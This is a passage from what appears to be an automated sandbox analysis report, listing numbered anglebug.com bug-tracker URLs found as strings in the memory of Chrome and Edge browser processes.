Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
